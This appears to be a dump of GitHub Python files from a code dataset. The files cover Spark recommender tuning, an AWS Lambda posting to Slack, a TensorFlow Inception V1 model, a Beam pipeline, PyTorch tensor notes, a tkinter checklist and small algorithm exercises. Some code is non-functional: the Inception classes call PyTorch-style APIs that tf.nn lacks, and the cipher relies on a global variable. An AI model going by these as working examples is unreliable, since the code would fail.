e2, e3, return_both_solutions=True, deg=True\n)\n\nassert solutions is None\n\n# now try getting a rotation of two-theta about the beam - this should (i)\n# be possible? and (ii) move the blind region into somewhere we can actually\n# record...\n\nR_tt = s0n.axis_and_angle_as_r3_rotation_matrix(2 * theta)\n\ns = rotation_decomposition.solve_r3_rotation_for_angles_given_axes(\n R_tt, e1, e2, e3, return_both_solutions=False, deg=False\n)\n\n# use solution\n\nprint(\"Using angles: %.3f %.3f\" % (180 * s[1] / math.pi, 180 * s[2] / math.pi))\n\nF = e2.axis_and_angle_as_r3_rotation_matrix(\n s[1]\n) * e3.axis_and_angle_as_r3_rotation_matrix(s[2])\n\ngonio.set_fixed_rotation(F.elems)\nwrite_expt(expts, sys.argv[3])\n","repo_name":"dials/dials_scratch","sub_path":"gw/mod_experiments.py","file_name":"mod_experiments.py","file_ext":"py","file_size_in_byte":3033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"13304330045","text":"#!/usr/bin/env python\n\n# imports\nimport pandas as pd\nimport numpy as np\nimport spark_helpers\n\n# pyspark modeling\nfrom pyspark.ml.feature import VectorAssembler\nfrom pyspark.ml.pipeline import Pipeline\nfrom pyspark.ml.recommendation import ALS, ALSModel\nfrom pyspark.ml.evaluation import RegressionEvaluator\nfrom pyspark.ml.tuning import CrossValidator, ParamGridBuilder\nimport pyspark as ps\nspark = ps.sql.SparkSession.builder \\\n .getOrCreate()\n\nsc = spark.sparkContext\n\ndef main():\n sc.setCheckpointDir('checkpoint/')\n ab3 = pd.read_pickle('ab6.pkl')\n spark_abpu_reviews = spark.createDataFrame(ab3)\n spark_abpu_reviews_clean = spark_abpu_reviews.drop(\n \"date\", \"title\", \"review_text\", \"source_id\", \"username\",\n \"review_id\", \"vote_count\", \"vote_sum\", \"customer_type\",\n \"date\", \"data_source\", \"podcast_id\", \"user_id\"\n )\n spark_abpu_training, spark_abpu_test = (\n spark_abpu_reviews_clean.randomSplit([0.8, 0.2])\n )\n tuningALS = ALS(userCol=\"spark_id\", itemCol=\"spark_pid\", ratingCol=\"rating\",\n coldStartStrategy=\"drop\", nonnegative=True,\n checkpointInterval=2, maxIter=40)\n #ranktuning = np.linspace(20,85,13, endpoint=False)\n #regtuning = np.linspace(0.22, 0.29, 15, endpoint = False)\n ranktuning = np.linspace(20,40,10, endpoint=False)\n regtuning = np.linspace(0.23, 0.28, 10, endpoint = False)\n paramGrid = ParamGridBuilder() \\\n .addGrid(tuningALS.rank, ranktuning) \\\n .addGrid(tuningALS.regParam, regtuning) \\\n .build()\n crossval = CrossValidator(estimator=tuningALS,\n estimatorParamMaps=paramGrid,\n evaluator=RegressionEvaluator(metricName=\"rmse\", labelCol=\"rating\",\n predictionCol=\"prediction\"), numFolds=5)\n cv_model = crossval.fit(spark_abpu_training)\n cv_info_dict = spark_helpers.get_CV_info(cv_model)\n spark_helpers.param_writer(cv_info_dict, \"param_tuning_results.txt\")\n spark_helpers.spark_model_saver(cv_model, \"best_model.sparkmodel\")\n\nif __name__==\"__main__\":\n main()\n","repo_name":"brettasmi/podrex","sub_path":"als_cv.py","file_name":"als_cv.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"67"} +{"seq_id":"23739079601","text":"import json\nimport boto3\nimport requests\nimport os\n\n\njs = \"\"\"\n{\n \"source\": [\n \"aws.ec2\"\n ],\n \"detail-type\": [\n \"EC2 Instance State-change Notification\"\n ],\n \"detail\": {\n \"state\": [\n \"stopping\"\n ],\n \"instance-id\": [\n \"\"\n ]\n }\n}\n\"\"\"\n\ncw_events = 
boto3.client('events')\nec2 = boto3.resource('ec2')\n\nSLACK_WEBHOOK_URL = os.environ['SLACK_WEBHOOK_URL']\n\ndef lambda_handler(event, context):\n    instance_id = event['detail']['instance-id']\n    instance = ec2.Instance(instance_id)\n    iid = ''.join(instance_id)\n    mid = ''.join(instance.image_id)\n    ejs={}\n    ejs = json.loads(js)\n    \n    ejs['detail']['instance-id'] = [event['detail']['instance-id']]\n\n    name = \"stopping-instance-\" + ''.join(instance_id)\n    response = instance.create_tags(Tags=[{'Key': 'Ami', 'Value': instance.image_id}])\n    response = cw_events.put_rule(\n        Name=name,\n        RoleArn='arn:aws:iam::534756183248:role/service-role/py-instance-ami-role-3m0yi8b0',\n        EventPattern=json.dumps(ejs),\n        State='ENABLED')\n    pt_response = cw_events.put_targets(\n        Rule=name,\n        Targets=[\n            {\n                'Id': \"1\",\n                'Arn': \"arn:aws:lambda:us-east-2:534756183248:function:Stopping-Instace\",\n            },\n        ]\n    )\n    \n    sr_arn = ''.join(response['RuleArn'])\n    data = { \"text\": \"Instance with image_id \" + mid + \" has started with stop-rule ARN \" + sr_arn }\n    response = requests.post(SLACK_WEBHOOK_URL, json=data, headers={'Content-Type': 'application/json'})\n","repo_name":"misterme00/aws-lamda","sub_path":"lamda_funtion.py","file_name":"lamda_funtion.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"42563941703","text":"''' This is an implementation of the research paper \"Going deeper with convolutions\", which introduced\n    the Inception V1 architecture''' \n''' The paper can be found here \"https://arxiv.org/abs/1409.4842\" '''\n\n'''The architecture of GoogleNet consists mainly of four classes, which are: \n    1- Convolutional Blocks\n    2- Auxiliary Blocks\n    3- Inception Blocks\n    4- The main GoogleNet '''\n\n''' The network is 22 layers deep when counting only layers with parameters (or 27 layers if we also count pooling).\n    The overall number of layers (independent building blocks) used for the construction of the network is about \n    100'''\n'''I will implement GoogleNet by using TensorFlow subclassing'''\n\n'''I will start by importing the main packages that I need'''\n\nimport tensorflow as tf\nfrom tensorflow import keras\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\n\n#tf.test.is_gpu_available(\n  #  cuda_only=False, min_cuda_compute_capability=None\n#)\n\n\n'''Now, I will implement the first class, which is the Convolutional Block. As written in the paper, each Convolutional_Block consists of:\n1- Convolutional layer.\n2- BatchNormalization layer.\n3- Activation (ReLu) layer.\n This class takes as arguments:\n1- input_channels \n2- output_channels \n3- convolutional_filters \n4- stride \n5- padding. 
'''\n\nclass Convolutional_Block(keras.layers.Layer):\n def __init__(self, \n input_channels, \n output_channels, \n convolutional_filters, \n stride, \n padding,\n name='2D convolution layer'):\n super(Convolutional_Block, self).__init__(name = name)\n self.convolution_2D_layer=tf.keras.layers.Conv2D(input_channels, output_channels, convolutional_filters, stride, padding)\n self.BatchNormalization=tf.keras.layers.BatchNormalization(output_channels)\n self.activation_layer=tf.nn.relu()\n\n def call(self,input):\n \"\"\"Calls the Convolutional_Block\n on the given inputs.\"\"\"\n input=self.convolution_2D_layer(input)\n input=self.BatchNormalization(input)\n input=self.activation_layer(input) \n return input\n\n\n# Let us implement the auxiliary classifiers as mentioned in the paper \n'''By adding auxiliary classifiers connected to these intermediate layers, we would expect to encourage \n discrimination in the lower stages in the classifier, increase the gradient signal that gets propagated\n back, and provide additional regularization. These classifiers take the form of smaller convolutional \n networks put on top of the output of the Inception (4a) and (4d) modules. During training, their loss\n gets added to the total loss of the network with a discount weight (the losses of the auxiliary classifiers\n were weighted by 0.3). At inference time, these auxiliary networks are discarded. The exact structure of\n the extra network on the side, including the auxiliary classifier, is as follows:\n 1- An average pooling layer with 5*5 filter size and stride 3, resulting in an 4*4*512 output\n for the (4a), and 4*4*528 for the (4d) stage.\n 2- A 1*1 convolution with 128 filters for dimension reduction and rectified linear activation.\n 3- A fully connected layer with 1024 units and rectified linear activation.\n 4- A dropout layer with 70% ratio of dropped outputs.\n 5- A linear layer with softmax loss as the classifier (predicting the same 1000 classes as the\n main classifier, but removed at inference time). 
''' \n\nclass Auxiliary_Block(keras.layers.Layer):\n def __init__(self, input_channels, number_classes):\n super(self,Auxiliary_Block).__init__()\n\n self.Adaptive_Avg_Pool2d = tf.nn.AdaptiveAvgPool2d((4, 4))\n self.convolution_2D_layer = tf.nn.Conv2d(input_channels, 128, convolutional_filters=1, stride=1, padding=0)\n self.activation_layer = tf.nn.ReLU()\n\n self.fully_conn_1 = tf.nn.Linear(2048, 1024)\n self.dropout = tf.nn.Dropout(0.7)\n self.fully_conn_2 = tf.nn.Linear(1024, number_classes)\n\n def call(self, input):\n output = self.Adaptive_Avg_Pool2d(input)\n\n output = self.convolution_2D_layer(output)\n output = self.activation_layer(output)\n print('out shape is ', output.shape)\n # out shape is torch.Size([2, 128, 4, 4])\n\n output = tf.keras.layers.Flatten(output, 1)\n\n output = self.fully_conn_1(output)\n output = self.activation_layer(output)\n output = self.dropout(output)\n\n output = self.fully_conn_2(output)\n\n return output\n\n\n\n'''Now i will implement the Inception Block.\nFrom the paper: \n\nAs these “Inception modules” are stacked on top of each other, their output correlation statistics\nare bound to vary: as features of higher abstraction are captured by higher layers, their spatial\nconcentration is expected to decrease suggesting that the ratio of 3*3 and 5*5 convolutions should\nincrease as we move to higher layers.\nOne big problem with the above modules, at least in this naive form, is that even a modest number of\n5*5 convolutions can be prohibitively expensive on top of a convolutional layer with a large number\nof filters. This problem becomes even more pronounced once pooling units are added to the mix:\ntheir number of output filters equals to the number of filters in the previous stage. The merging of\nthe output of the pooling layer with the outputs of convolutional layers would lead to an inevitable\nincrease in the number of outputs from stage to stage. Even while this architecture might cover the\noptimal sparse structure, it would do it very inefficiently, leading to a computational blow up within\na few stages.\nThis leads to the second idea of the proposed architecture: judiciously applying dimension reductions\nand projections wherever the computational requirements would increase too much otherwise.\nThis is based on the success of embeddings: even low dimensional embeddings might contain a lot\nof information about a relatively large image patch. However, embeddings represent information in\na dense, compressed form and compressed information is harder to model. We would like to keep\nour representation sparse at most places (as required by the conditions of [2]) and compress the\nsignals only whenever they have to be aggregated en masse. That is, 1*1 convolutions are used to\ncompute reductions before the expensive 3*3 and 5*5 convolutions. Besides being used as reductions,\nthey also include the use of rectified linear activation which makes them dual-purpose. The\nfinal result is depicted in Figure 2(b).\nIn general, an Inception network is a network consisting of modules of the above type stacked upon\neach other, with occasional max-pooling layers with stride 2 to halve the resolution of the grid. For\ntechnical reasons (memory efficiency during training), it seemed beneficial to start using Inception\nmodules only at higher layers while keeping the lower layers in traditional convolutional fashion.\nThis is not strictly necessary, simply reflecting some infrastructural inefficiencies in our current\nimplementation. 
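\n\nA quick arithmetic illustration that I add here (my own commentary, not from the paper):\nreplacing a direct 5*5 convolution from 192 to 32 channels (5*5*192*32 = 153,600\nmultiply-adds per spatial position) with a 1*1 reduction to 16 channels followed by a\n5*5 convolution (1*1*192*16 + 5*5*16*32 = 15,872) cuts the cost by roughly a factor of 10.\n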
''' \n\nclass Inception_Block(keras.layers.Layer):\n def __init__(self,\n input_channels,\n num1x1,\n Reduction_layer_filters_3_by_3,\n num3x3,\n Reduction_layer_filters_5_by_5,\n num5x5,\n pooling_projectionn,):\n\n super(Inception_Block,self).__init__()\n\n #I will follow the block diagram in Figure 3 and the table 1 in page 6\n self.Block_1=tf.nn.Sequential(\n Convolutional_Block(input_channels, num1x1, convolutional_filters=1, stride=1, padding=0)\n )\n self.Block_2=tf.nn.Sequential(\n Convolutional_Block(input_channels, Reduction_layer_filters_3_by_3, convolutional_filters=1, stride=1, padding=0),\n Convolutional_Block(Reduction_layer_filters_3_by_3, num3x3, convolutional_filters=3, stride=1, padding=1)\n )\n self.Block_3=tf.nn.Sequential(\n Convolutional_Block(input_channels, Reduction_layer_filters_5_by_5, convolutional_filters=1, stride=1, padding=0),\n Convolutional_Block(Reduction_layer_filters_5_by_5, num5x5, convolutional_filters=5, stride=1, padding=2),\n )\n self.Block_4=tf.nn.Sequential(\n tf.nn.MaxPool2d(3, stride=1, padding=1, ceil_mode=True),\n Convolutional_Block(input_channels,pooling_projectionn, convolutional_filters=1, stride=1, padding=0),\n )\n def call(self, input):\n # We need to invoke the Blocks. All of them taking the saem input at the beggining and then \n # we have to concatenate them all together according to the block diagram in the paper\n\n Block_1 = self.Block_1(input)\n Block_2 = self.Block_2(input)\n Block_3 = self.Block_3(input)\n Block_4 = self.Block_4(input)\n #concatenate them all together as in the paper\n return tf.keras.layers.Concatenate([Block_1, Block_2, Block_3, Block_4], 1)\n\n\n\n# Building the Inception_V1 from the block diagram as in the paper\n\nclass Inception_V1(keras.layers.Layer):\n def __init__(self, number_classes=10):\n super(Inception_V1, self).__init__()\n\n self.First_Conv_Block = Convolutional_Block(3, 64, convolutional_filters=7, stride=2, padding=3)\n self.Max_pooling_operation_1st = tf.nn.MaxPool2d(3, stride=2, padding=0, ceil_mode=True)\n self.Second_Conv_Block = Convolutional_Block(64, 64, convolutional_filters=1, stride=1, padding=0)\n self.Third_Conv_Block = Convolutional_Block(64, 192, convolutional_filters=3, stride=1, padding=1)\n self.Max_pooling_operation_2nd = tf.nn.MaxPool2d(3, stride=2, padding=0, ceil_mode=True)\n # We have 9 inception block in the paper \n self.Inception_Block_1 = Inception_Block(\n input_channels=192,\n num1x1=64,\n Reduction_layer_filters_3_by_3=96,\n num3x3=128,\n Reduction_layer_filters_5_by_5=16,\n num5x5=32,\n pooling_projectionn=32,\n )\n self.Inception_Block_2 = Inception_Block(\n input_channels=256,\n num1x1=128,\n Reduction_layer_filters_3_by_3=128,\n num3x3=192,\n Reduction_layer_filters_5_by_5=32,\n num5x5=96,\n pooling_projectionn=64,\n )\n self.Max_pooling_operation_3rd = tf.nn.MaxPool2d(3, stride=2, padding=0, ceil_mode=True)\n\n self.Inception_Block_3 = Inception_Block(\n input_channels=480,\n num1x1=192,\n Reduction_layer_filters_3_by_3=96,\n num3x3=208,\n Reduction_layer_filters_5_by_5=16,\n num5x5=48,\n pooling_projectionn=64,\n )\n self.Inception_Block_4 = Inception_Block(\n input_channels=512,\n num1x1=160,\n Reduction_layer_filters_3_by_3=112,\n num3x3=224,\n Reduction_layer_filters_5_by_5=24,\n num5x5=64,\n pooling_projectionn=64,\n )\n self.Inception_Block_5 = Inception_Block(\n input_channels=512,\n num1x1=128,\n Reduction_layer_filters_3_by_3=128,\n num3x3=256,\n Reduction_layer_filters_5_by_5=24,\n num5x5=64,\n pooling_projectionn=64,\n )\n self.Inception_Block_6 = 
Inception_Block(\n input_channels=512,\n num1x1=112,\n Reduction_layer_filters_3_by_3=144,\n num3x3=288,\n Reduction_layer_filters_5_by_5=32,\n num5x5=64,\n pooling_projectionn=64,\n )\n self.Inception_Block_7 = Inception_Block(\n input_channels=528,\n num1x1=256,\n Reduction_layer_filters_3_by_3=160,\n num3x3=320,\n Reduction_layer_filters_5_by_5=32,\n num5x5=128,\n pooling_projectionn=128,\n )\n self.Max_pooling_operation_4th = tf.nn.MaxPool2d(3, stride=2, padding=0, ceil_mode=True)\n\n self.Inception_Block_8 = Inception_Block(\n input_channels=832,\n num1x1=256,\n Reduction_layer_filters_3_by_3=160,\n num3x3=320,\n Reduction_layer_filters_5_by_5=32,\n num5x5=128,\n pooling_projectionn=128,\n )\n self.Inception_Block_9 = Inception_Block(\n input_channels=832,\n num1x1=384,\n Reduction_layer_filters_3_by_3=192,\n num3x3=384,\n Reduction_layer_filters_5_by_5=48,\n num5x5=128,\n pooling_projectionn=128,\n )\n self.Max_pooling_operation_5th = tf.nn.AdaptiveAvgPool2d((1, 1))\n\n self.dropout = tf.nn.Dropout(0.4)\n self.fc = tf.nn.Linear(1024, number_classes)\n\n self.Auxiliary_Block_1 = Auxiliary_Block(512, number_classes)\n self.Auxiliary_Block_2 = Auxiliary_Block(528, number_classes)\n\n def call(self, input):\n output = self.First_Conv_Block(input)\n output = self.Max_pooling_operation_1st(output)\n output = self.Second_Conv_Block(output)\n output = self.Third_Conv_Block(output)\n output = self.Max_pooling_operation_2nd(output)\n output = self.Inception_Block_1(output)\n output = self.Inception_Block_2(output)\n output = self.Max_pooling_operation_3rd(output)\n output = self.Inception_Block_3(output)\n\n Auxiliary_Block_1_output = self.Auxiliary_Block_1(output)\n\n output = self.Inception_Block_4(output)\n output = self.Inception_Block_5(output)\n output = self.Inception_Block_6(output)\n\n Auxiliary_Block_2_output = self.Auxiliary_Block_2(output)\n\n output = self.Inception_Block_7(output)\n output = self.Max_pooling_operation_4th(output)\n output = self.Inception_Block_8(output)\n output = self.Inception_Block_9(output)\n output = self.Max_pooling_operation_5th(output)\n output = tf.keras.layers.Flatten(output, 1)\n output = self.dropout(output)\n output = self.fc(output)\n\n return output, Auxiliary_Block_1_output, Auxiliary_Block_2_output\n\n\n\n","repo_name":"akramsalim/Computer-Vision","sub_path":"Inception_V1.py","file_name":"Inception_V1.py","file_ext":"py","file_size_in_byte":14217,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"29379971874","text":"from apache_beam.options.pipeline_options import PipelineOptions\nfrom google.cloud import pubsub_v1\nfrom google.cloud import bigquery\nimport apache_beam as beam\nimport logging\nimport argparse\nimport sys\nimport re\n\n\nPROJECT=\"user-logs-237110\"\nschema = 'remote_addr:STRING, timelocal:STRING, request_type:STRING, status:STRING, body_bytes_sent:STRING, http_referer:STRING, http_user_agent:STRING'\nTOPIC = \"projects/user-logs-237110/topics/userlogs\"\n\n\ndef regex_clean(data):\n\n PATTERNS = [r'(^\\S+\\.[\\S+\\.]+\\S+)\\s',r'(?<=\\[).+?(?=\\])',\n r'\\\"(\\S+)\\s(\\S+)\\s*(\\S*)\\\"',r'\\s(\\d+)\\s',r\"(?<=\\[).\\d+(?=\\])\",\n r'\\\"[A-Z][a-z]+', r'\\\"(http|https)://[a-z]+.[a-z]+.[a-z]+']\n result = []\n for match in PATTERNS:\n try:\n reg_match = re.search(match, data).group()\n if reg_match:\n result.append(reg_match)\n else:\n result.append(\" \")\n except:\n print(\"There was an error with the regex search\")\n result = [x.strip() for x in result]\n result = 
[x.replace('\"', \"\") for x in result]\n res = ','.join(result)\n return res\n\n\nclass Split(beam.DoFn):\n\n def process(self, element):\n from datetime import datetime\n element = element.split(\",\")\n d = datetime.strptime(element[1], \"%d/%b/%Y:%H:%M:%S\")\n date_string = d.strftime(\"%Y-%m-%d %H:%M:%S\")\n\n return [{ \n 'remote_addr': element[0],\n 'timelocal': date_string,\n 'request_type': element[2],\n 'body_bytes_sent': element[3],\n 'status': element[4],\n 'http_referer': element[5],\n 'http_user_agent': element[6]\n \n }]\n\ndef main(argv=None):\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--input_topic\")\n parser.add_argument(\"--output\")\n known_args = parser.parse_known_args(argv)\n\n\n p = beam.Pipeline(options=PipelineOptions())\n\n (p\n | 'ReadData' >> beam.io.ReadFromPubSub(topic=TOPIC).with_output_types(bytes)\n | \"Decode\" >> beam.Map(lambda x: x.decode('utf-8'))\n | \"Clean Data\" >> beam.Map(regex_clean)\n | 'ParseCSV' >> beam.ParDo(Split())\n | 'WriteToBigQuery' >> beam.io.WriteToBigQuery('{0}:userlogs.streaminglogs'.format(PROJECT), schema=schema,\n write_disposition=beam.io.BigQueryDisposition.WRITE_APPEND)\n )\n result = p.run()\n result.wait_until_finish()\n\nif __name__ == '__main__':\n logger = logging.getLogger().setLevel(logging.INFO)\n main()\n","repo_name":"DFoly/User_log_pipeline","sub_path":"main_pipeline_stream.py","file_name":"main_pipeline_stream.py","file_ext":"py","file_size_in_byte":2450,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"67"} +{"seq_id":"25135407348","text":"\"\"\"\nGiven two integer arrays arr1 and arr2,\nreturn the minimum number of operations (possibly zero) needed to make arr1 strictly increasing.\n\nIn one operation,\nyou can choose two indices 0 <= i < arr1.length and 0 <= j < arr2.length and do the assignment arr1[i] = arr2[j].\n\nIf there is no way to make arr1 strictly increasing, return -1.\n\"\"\"\nimport bisect\nfrom typing import List\n\n\nclass Solution:\n def makeArrayIncreasing(self, arr1: List[int], arr2: List[int]) -> int:\n\n arr2.sort()\n def find(value):\n res = float('inf')\n left, right = 0, len(arr2) - 1\n while left <= right:\n pivot = (left + right) // 2\n if arr2[pivot] > value:\n res = min(res, arr2[pivot])\n right = pivot - 1\n else:\n left = pivot + 1\n\n return res if res != float('inf') else -1\n\n visited = {}\n\n def dp(index, prev):\n if index == len(arr1):\n return 0\n if (index, prev) in visited:\n return visited[(index, prev)]\n\n res = float('inf')\n\n if arr1[index] > prev:\n res = min(res, dp(index + 1, arr1[index]))\n\n greater_than = find(prev)\n if greater_than != -1:\n res = min(res, 1 + dp(index + 1, greater_than))\n\n visited[(index, prev)] = res\n\n return res\n\n res = dp(0, -1)\n return res if res != float('inf') else -1\n\n\n\nif __name__ == '__main__':\n arr1 = [1, 5, 3, 6, 7]\n arr2 = [1, 3, 2, 4]\n sol = Solution()\n result = sol.makeArrayIncreasing(arr1, arr2)\n print(result)\n","repo_name":"ilyakuzmin9/leetcode","sub_path":"1187_make-array-strictly-increasing.py","file_name":"1187_make-array-strictly-increasing.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"42282842076","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\nimport torch\n\n\n# # torch tensor常用操作\n\n# In[3]:\n\n\nx = torch.tensor([[1,2,3,4],\n [4,3,2,1]], \n dtype=torch.float32)\nx\n\n\n# ## x.argmax(dim=n) \n# - 
按照维度,取最大值的索引\n\n# In[4]:\n\n\nx.argmax(dim=1) # 按照列,实际上就是行\n\n\n# ## x.softmax(dim=n)\n# - 相加得1的概率分布\n\n# In[5]:\n\n\nx.softmax(dim=1)\n\n\n# In[6]:\n\n\ny = torch.randn(1,4)\ny\n\n\n# ## torch.cat((x, y), dim=0)\n# - 对数据沿着某一维度进行拼接。\n# - cat后数据的总维数不变。\n# - 比如下面代码对两个2维tensor(分别为2*4,1*4)进行拼接,拼接完后变为3*4还是2维的tensor。\n\n# In[7]:\n\n\ntorch.cat((x, y), dim=0) # 合并,其余维度相同\n\n\n# ## torch.stack() 增加新的维度进行堆叠\n# - stack则会增加新的维度。\n# - 如对两个1*2维的tensor在第0个维度上stack,则会变为2*1*2的tensor;在第1个维度上stack,则会变为1*2*2的tensor。\n\n# In[8]:\n\n\na = torch.randn(1,2)\na\n\n\n# In[9]:\n\n\nb = torch.randn(1,2)\nb\n\n\n# In[10]:\n\n\nc = torch.stack((a, b), dim=0)\nc\n\n\n# In[11]:\n\n\nc.size()\n\n\n# In[12]:\n\n\nd = torch.stack((a, b), dim=1)\nd\n\n\n# ## transpose 交换维度\n# - 维度互换,只能两个维度\n\n# In[13]:\n\n\nx\n\n\n# In[14]:\n\n\nx.transpose(0,1)\n\n\n# In[15]:\n\n\nx.transpose(1,0)\n\n\n# In[16]:\n\n\nx = torch.randn(2,3,5)\nx\n\n\n# In[17]:\n\n\nx.transpose(1,2)\n\n\n# In[18]:\n\n\nx.transpose(1,2).size()\n\n\n# ## x.permute()\n# - 适合多维数据,更灵活的transpose\n# - permute是更灵活的transpose,可以灵活的对原数据的维度进行调换,而数据本身不变。\n\n# In[19]:\n\n\nx = torch.randn(2,3,5)\nx\n\n\n# In[20]:\n\n\ny = x.permute(1,2,0)\ny.size()\n\n\n# In[21]:\n\n\ny\n\n\n# ## x.reshape()\n# - 数据不变,改变tensor的形状\n\n# In[22]:\n\n\nx.shape\n\n\n# In[23]:\n\n\nx.reshape(3,1,10)\n\n\n# In[24]:\n\n\nx.reshape(5,6)\n\n\n# ## x.view()\n# - 改变形状\n\n# In[25]:\n\n\nx.view(-1, 2, 3)\n\n\n# In[26]:\n\n\nx.view(-1, 15)\n\n\n# In[27]:\n\n\nx\n\n\n# ## x.unsqueeze/squeeze\n# - squeeze(dim_n)压缩,即去掉元素数量为1的dim_n维度。\n# - 同理unsqueeze(dim_n),增加dim_n维度,元素数量为1。\n\n# In[28]:\n\n\nx = torch.randn(5,1,3)\nx.size()\n\n\n# In[29]:\n\n\nx.squeeze(dim=1).size()\n\n\n# In[30]:\n\n\n# squeeze 挤压\nx.unsqueeze(dim=0).size()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"zingp/ml-py-lib","sub_path":"PyTorchCS/torch_tensor.py","file_name":"torch_tensor.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"36953015894","text":"from tkinter import *\nfrom tkinter import messagebox\n\ndef addItem():\n item = entry.get()\n if item != \"\":\n listBox.insert(END, item)\n entry.delete(0, END)\n else:\n messagebox.showerror(\"Error\", \"Enter something\")\n\n\ndef deleteItem(event=None):\n try:\n if event:\n selected = listBox.nearest(event.y)\n else:\n selected = listBox.curselection()[0]\n item = listBox.get(selected)\n if item.startswith('\\u2713'):\n item = item[1:]\n listBox.delete(selected)\n listBox.insert(selected, item)\n listBox.itemconfig(selected, {'fg': 'black'})\n else:\n checkedItem = \"\\u2713\" + item\n listBox.delete(selected)\n listBox.insert(selected, checkedItem)\n listBox.itemconfig(selected, {'fg': 'gray'})\n except Exception as e:\n print(e)\n messagebox.showerror(\"Error\", \"Select something\")\n\n\nroot = Tk()\nroot.title(\"Checklist App\")\nroot.geometry(\"800x800\")\n\nframe1 = Frame(root)\nframe1.pack(padx=10, pady=10)\n\nlistBox = Listbox(frame1, width=60, height=30, font=('Arial', 14))\nlistBox.pack(side=LEFT, fill=Y)\n\nscrollBar = Scrollbar(frame1, orient=VERTICAL)\nscrollBar.config(command=listBox.yview)\nscrollBar.pack(side=LEFT, fill=Y)\n\nlistBox.config(yscrollcommand=scrollBar.set)\n# Bind the double-click event to the deleteItem function\nlistBox.bind('', deleteItem)\n\n# Pre-set list of items with separators\npreSetItems = [ \"СПАЛЬНАЯ СИСТЕМА\",\"---\",\"Спальник\", \"Коврик / Матрас\",\"Спальная одежда\", \"Подушка (при наличии)\",\n \" \",\n \"КУХНЯ\", \"---\", \"Вилка / Ложка\", 
\"Кружка\", \"Тарелка глубокая\",\n \" \",\n\n \"ВНЕШНЕЕ\", \"---\", \"Рюкзак\", \"Обувь (походная)\", \"Куртка непродуваемая\", \"Штаны\", \"Термобелье\", \"Носки (3-4 пары)\",\n \"Утепление для лагеря\",\n '',\n\n \"ДОПОЛНИТЕЛЬНО\", \"---\", \"Гигиена ( туалетка, щетка и тд)\", \"Салфетки влажные\", \"Зажигалка\", \"Нож (маленький)\",\n \"Мусорный мешок\", \"Фонарь налобный\", \"Павербанк\", \"Накидка от дождя\"\n\n ]\n\n# Insert pre-set items into the Listbox\nfor item in preSetItems:\n if item.startswith(\"---\"):\n listBox.insert(END, \"-\"*60) # insert separator line\n else:\n listBox.insert(END, item)\n\nentry = Entry(root, width=40, font=('Arial', 14))\nentry.pack(padx=10, pady=10)\n\nframe2 = Frame(root)\nframe2.pack(padx=10, pady=10)\n\naddButton = Button(frame2, text=\"Add\", font=('Arial', 14), command=addItem)\naddButton.pack(side=LEFT)\n\ndeleteButton = Button(frame2, text=\"Check\", font=('Arial', 14), command=deleteItem)\ndeleteButton.pack(side=LEFT, padx=10)\n\nroot.mainloop()\n","repo_name":"Troppppr/CheckListApp","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3029,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"71236265814","text":"def cipher(sentence):\n chara_list = []\n for i in range(len(sentence)):\n if sentence[i].islower() == True:\n convert_chara = chr(219 - ord(sentence[i]))\n chara_list.append(convert_chara)\n else:\n chara_list.append(sentence[i])\n reverse_sentence = \"\".join(chara_list)\n return reverse_sentence\n\ndef recipher(sentence):\n chara_list = []\n for i in range(len(sentence)):\n if reverse_sentence[i].islower() == True:\n re_chara = chr(219 - ord(sentence[i]))\n chara_list.append(re_chara)\n else:\n chara_list.append(sentence[i])\n re_sentence = \"\".join(chara_list)\n return re_sentence\n\n\nif __name__ == '__main__':\n sentence = \"\"\n reverse_sentence = cipher(sentence)\n print(reverse_sentence)\n resentence = recipher(reverse_sentence)\n print(resentence)","repo_name":"yukou-isshiki/NLP_100_exercise_2020","sub_path":"1/1-8-1.py","file_name":"1-8-1.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"43590889478","text":"\n\"\"\"\nClarification (~2 min)\nStart with the naive solution (~3 min)\nOptimize the naive solution (~10 min)\nTranslate the pseudocode into real code (~15 min)\nTest thoroughly (5 min)\nAnalyze time and space complexity (1 min)\n\"\"\"\n\n# Time: O(n)\n# Space: O(n)\n\n\ndef main(string):\n pattern = [-1 for _ in string]\n j = 0\n i = 1\n while i < len(string):\n if string[i] == string[j]:\n pattern[i] = j\n i += 1\n j += 1\n elif j > 0:\n j = pattern[j - 1] + 1\n else:\n i += 1\n return j\n\n\n# Test case 1: Normal or Given input\nprint(main(\"abab\"))\n# Test case 2: Normal or Given input\nprint(main(\"aaaa\"))\n# Test case 3: Normal or Given input\nprint(main(\"gigummcnu\"))\n# Test case 4: Negative\nprint(main(\"u\"))\n# Test case 5: Empty\n# print(s.main())\n# Test case 6: Too long\n# print(s.main())\n# Test case 7\n# Test case 8\n# Test case 9","repo_name":"gunjanmodi/algorithms","sub_path":"algorithms/strings/longest_prefix_suffix.py","file_name":"longest_prefix_suffix.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"32766881001","text":"import os\nimport os.path\nimport re\nimport shutil\n\npath = 
